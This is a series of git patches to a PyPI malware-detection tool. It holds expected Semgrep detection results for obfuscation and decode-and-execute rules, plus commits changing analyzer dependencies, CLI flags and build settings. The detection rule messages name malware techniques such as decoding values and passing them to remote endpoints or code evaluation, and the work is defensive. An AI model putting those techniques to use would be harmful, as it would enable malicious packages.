"obfuscation/inline_imports.py", - "start": 31, - "end": 31 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 32, - "end": 32 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 69, - "end": 69 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ - { - "file": "obfuscation/obfuscation_tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/obfuscation_tools.py", - "start": 68, - "end": 68 - } - ] + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } } From 5bcd90eb5ffc5d7172f63572192f4d9700b19b2c Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 26 Mar 2025 14:52:46 +1000 Subject: [PATCH 28/37] fix: updated sourcecode analyzer name appropriately Signed-off-by: Carl Flottmann --- .../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 82e2406af..7632884b1 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -51,7 +51,7 @@ def __init__(self, resources_path: str | None = None) -> None: validation of the custom rule path failed. """ super().__init__( - name="anomalous_version_analyzer", + name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], ) From 6086e26fe103225f0ec45503a288ca1521b91058 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 31 Mar 2025 11:12:45 +1000 Subject: [PATCH 29/37] chore: sourcecode analyzer now depends on source code repo heuristic Signed-off-by: Carl Flottmann --- .../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 7632884b1..6c4bf7d29 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -53,7 +53,7 @@ def __init__(self, resources_path: str | None = None) -> None: super().__init__( name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, - depends_on=[(Heuristics.EMPTY_PROJECT_LINK, HeuristicResult.FAIL)], + depends_on=[(Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL)], ) if resources_path is None: resources_path = global_config.resources_path From 2fe39dcc346c724c0f8c1faee0ada0a894e568cf Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 14 Apr 2025 11:15:50 +1000 Subject: [PATCH 30/37] fix: now depends on source code repo being skipped as well Signed-off-by: Carl Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 6c4bf7d29..02bad65cd 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -53,7 +53,13 @@ def __init__(self, resources_path: str | None = None) -> None: super().__init__( name="suspicious_patterns_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, - depends_on=[(Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL)], + # We include the SKIP condition here as we want to consider the case where EMPTY_PROJECT_LINK fails, + # meaning SOURCE_CODE_REPO is skipped, as this is still a scenario where the source code repository + # is not available, so we want to run source code analysis. + depends_on=[ + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.FAIL), + (Heuristics.SOURCE_CODE_REPO, HeuristicResult.SKIP), + ], ) if resources_path is None: resources_path = global_config.resources_path From 23aa6136ae94629e28c9be025cc11cac7e428992 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 10:55:47 +1000 Subject: [PATCH 31/37] chore: rebasing onto main Signed-off-by: Carl Flottmann --- src/macaron/slsa_analyzer/package_registry/pypi_registry.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 8f86f0dc1..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -20,12 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -<<<<<<< HEAD -from macaron.errors import ConfigurationError, InvalidHTTPResponseError -======= -from macaron.database.table_definitions import Component from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError ->>>>>>> 0de258c9 (refactor: support for semgrep as the code analysis tool) from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry From 8c444acfc015b630fb19bfebbe59c1b36acf0591 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 11:00:16 +1000 Subject: [PATCH 32/37] chore: rebasing onto main Signed-off-by: Carl Flottmann --- .../slsa_analyzer/checks/detect_malicious_metadata_check.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 9b056da4c..0196ec93b 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -297,8 +297,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, - package_sourcecode={}, - package_sourcecode_path="" + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) From ee2b8fdbb7a77bf96e43f84813854e4da7f8a9a7 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 14:08:24 +1000 Subject: [PATCH 33/37] fix: build error after rebase fixed Signed-off-by: Carl Flottmann --- src/macaron/repo_finder/repo_finder_pypi.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 7525c3779..cd9b331a7 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 +67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR From 2afcd59c9ca925c29361c8509c804d931d46a804 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 17 Apr 2025 16:27:13 +1000 Subject: [PATCH 34/37] fix: ci problems with formatting on test file Signed-off-by: Carl Flottmann --- .../test_detect_malicious_metadata_check.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 3d84ee310..3910b9579 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -40,13 +40,15 @@ pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) -def test_detect_malicious_metadata(mock_global_config: MagicMock, - httpserver: HTTPServer, - tmp_path: Path, - macaron_path: Path, - purl: str, - expected: str, - experimental: bool) -> None: +def test_detect_malicious_metadata( + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool, +) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -143,5 +145,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type] From 4b16ae3fba740710e15acae0367faca08a8e6d2f Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 15 May 2025 16:07:02 +1000 Subject: [PATCH 35/37] build: semgrep is no longer an experimental dependency, and updated it to reflect the bfs version Signed-off-by: Carl Flottmann --- Makefile | 2 +- pyproject.toml | 5 +---- 2 files changed, 2 insertions(+), 5 deletions(-) diff --git a/Makefile b/Makefile index dc39b88a6..029cdc163 100644 --- a/Makefile +++ b/Makefile @@ -206,7 +206,7 @@ upgrade: .venv/upgraded-on .venv/upgraded-on: pyproject.toml python -m pip install --upgrade pip python -m pip install --upgrade wheel - python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker,experimental] + python -m pip install --upgrade --upgrade-strategy eager --editable .[actions,dev,docs,hooks,test,test-docker] $(MAKE) upgrade-quiet force-upgrade: rm -f .venv/upgraded-on diff --git a/pyproject.toml b/pyproject.toml index aa93bd1a4..4fa6b89d5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,6 +37,7 @@ dependencies = [ "beautifulsoup4 >= 4.12.0,<5.0.0", "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", + "semgrep == 1.113.0", ] keywords = [] # https://pypi.org/classifiers/ @@ -107,10 +108,6 @@ test-docker = [ "ruamel.yaml >=0.18.6,<1.0.0", ] -experimental = [ - "semgrep == 1.102.0", -] - [project.urls] Homepage = "https://github.com/oracle/macaron" Changelog = "https://github.com/oracle/macaron/blob/main/CHANGELOG.md" From c3c43a7106403ad9da9923908beaa01673c91004 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 19 May 2025 11:15:20 +1000 Subject: [PATCH 36/37] fix: confirm semgrep uninstall, and remove 'experimental' mentions --- docker/Dockerfile.final | 2 +- src/macaron/__main__.py | 2 +- src/macaron/malware_analyzer/README.md | 4 ++-- .../checks/detect_malicious_metadata_check.py | 2 +- .../pypi/test_pypi_sourcecode_analyzer.py | 2 +- .../checks/test_detect_malicious_metadata_check.py | 10 ++++++---- 6 files changed, 12 insertions(+), 10 deletions(-) diff --git a/docker/Dockerfile.final b/docker/Dockerfile.final index ad1d88c19..49c1071cf 100644 --- a/docker/Dockerfile.final +++ b/docker/Dockerfile.final @@ -46,7 +46,7 @@ RUN : \ && . .venv/bin/activate \ && pip install --no-compile --no-cache-dir --upgrade pip setuptools \ && find $HOME/dist -depth \( -type f \( -name "macaron-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ - && pip uninstall semgrep \ + && pip uninstall semgrep -y \ && find $HOME/dist -depth \( -type f \( -name "semgrep-*.whl" \) \) -exec pip install --no-compile --no-cache-dir '{}' \; \ && rm -rf $HOME/dist \ && deactivate diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index 2833b32af..fad56aaa4 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -481,7 +481,7 @@ def main(argv: list[str] | None = None) -> None: required=False, action="store_true", help=( - "EXPERIMENTAL. For improved malware detection, analyze the source code of the" + "For improved malware detection, analyze the source code of the" + " (PyPI) package using a textual scan and dataflow analysis." ), ) diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index 9c083e958..bbd32fcb2 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,9 +52,9 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. -### Experimental: Source Code Analysis with Semgrep +### Source Code Analysis with Semgrep -The following analyzer has been added in as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: +The following analyzer has been included as an optional feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: **PyPI Source Code Analyzer** - **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 0196ec93b..31ff353f2 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -316,7 +316,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - # experimental sourcecode analysis feature + # optional sourcecode analysis feature if ctx.dynamic_data["analyze_source"]: try: sourcecode_result, sourcecode_detail_info = self.analyze_source( diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 3fb423e46..16f246407 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -1,7 +1,7 @@ # Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. -"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +"""Tests detecting malicious patterns in PyPI package sourcecode.""" import json import os from unittest.mock import MagicMock, patch diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 3910b9579..fe7c2f701 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -26,7 +26,7 @@ @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected", "experimental"), + ("purl", "expected", "sourcecode_analysis"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV @@ -37,7 +37,9 @@ pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving # the issue of this false negative. - pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), + pytest.param( + "pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_sourcecode_analysis_malicious_pypi_package" + ), ], ) def test_detect_malicious_metadata( @@ -47,7 +49,7 @@ def test_detect_malicious_metadata( macaron_path: Path, purl: str, expected: str, - experimental: bool, + sourcecode_analysis: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -56,7 +58,7 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] - if experimental: + if sourcecode_analysis: ctx.dynamic_data["analyze_source"] = True mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") From 36d91cfe49b4a7694dcf0b55ea171985c7841624 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 19 May 2025 14:28:47 +1000 Subject: [PATCH 37/37] feat: can now force sourcecode analysis to run via CLI Signed-off-by: Carl Flottmann --- src/macaron/__main__.py | 14 ++++++++++++++ src/macaron/slsa_analyzer/analyze_context.py | 3 +++ src/macaron/slsa_analyzer/analyzer.py | 8 ++++++++ .../checks/detect_malicious_metadata_check.py | 8 +++++--- 4 files changed, 30 insertions(+), 3 deletions(-) diff --git a/src/macaron/__main__.py b/src/macaron/__main__.py index fad56aaa4..7e380d989 100644 --- a/src/macaron/__main__.py +++ b/src/macaron/__main__.py @@ -96,6 +96,10 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None global_config.local_maven_repo = user_provided_local_maven_repo + if analyzer_single_args.force_analyze_source and not analyzer_single_args.analyze_source: + logger.error("'--force-analyze-source' requires '--analyze-source'.") + sys.exit(os.EX_USAGE) + analyzer = Analyzer(global_config.output_path, global_config.build_log_path) # Initiate reporters. @@ -174,6 +178,7 @@ def analyze_slsa_levels_single(analyzer_single_args: argparse.Namespace) -> None provenance_payload=prov_payload, verify_provenance=analyzer_single_args.verify_provenance, analyze_source=analyzer_single_args.analyze_source, + force_analyze_source=analyzer_single_args.force_analyze_source, ) sys.exit(status_code) @@ -486,6 +491,15 @@ def main(argv: list[str] | None = None) -> None: ), ) + single_analyze_parser.add_argument( + "--force-analyze-source", + required=False, + action="store_true", + help=( + "Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'." + ), + ) + single_analyze_parser.add_argument( "--verify-provenance", required=False, diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 0f0804dc1..56199e085 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -53,6 +53,8 @@ class ChecksOutputs(TypedDict): """The local artifact absolute paths.""" analyze_source: bool """True when PyPI source code analysis has been enabled.""" + force_analyze_source: bool + """When True, enforces running source code analysis, regardless of other heuristic results.""" class AnalyzeContext: @@ -107,6 +109,7 @@ def __init__( provenance_info=None, local_artifact_paths=[], analyze_source=False, + force_analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index ed5dfe039..632fcba17 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -138,6 +138,7 @@ def run( provenance_payload: InTotoPayload | None = None, verify_provenance: bool = False, analyze_source: bool = False, + force_analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -158,6 +159,8 @@ def run( Enable provenance verification if True. analyze_source : bool When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -192,6 +195,7 @@ def run( provenance_payload=provenance_payload, verify_provenance=verify_provenance, analyze_source=analyze_source, + force_analyze_source=force_analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -311,6 +315,7 @@ def run_single( provenance_payload: InTotoPayload | None = None, verify_provenance: bool = False, analyze_source: bool = False, + force_analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -331,6 +336,8 @@ def run_single( Enable provenance verification if True. analyze_source : bool When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -542,6 +549,7 @@ def run_single( ) analyze_ctx.dynamic_data["analyze_source"] = analyze_source + analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 31ff353f2..57027b73f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -101,7 +101,7 @@ def _should_skip( return False def analyze_source( - self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult], force: bool = False ) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the source code of the package with a textual scan, looking for malicious code patterns. @@ -112,6 +112,8 @@ def analyze_source( results: dict[Heuristics, HeuristicResult] Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result associated with that heuristic. + force: bool + Forces sourcecode analysis to run regardless of heuristic results. Defaults to False. Returns ------- @@ -128,7 +130,7 @@ def analyze_source( logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) analyzer = PyPISourcecodeAnalyzer() - if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): + if not force and analyzer.depends_on and self._should_skip(results, analyzer.depends_on): return HeuristicResult.SKIP, {} try: @@ -320,7 +322,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: if ctx.dynamic_data["analyze_source"]: try: sourcecode_result, sourcecode_detail_info = self.analyze_source( - pypi_package_json, heuristic_results + pypi_package_json, heuristic_results, force=ctx.dynamic_data["force_analyze_source"] ) except (HeuristicAnalyzerValueError, ConfigurationError): return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN)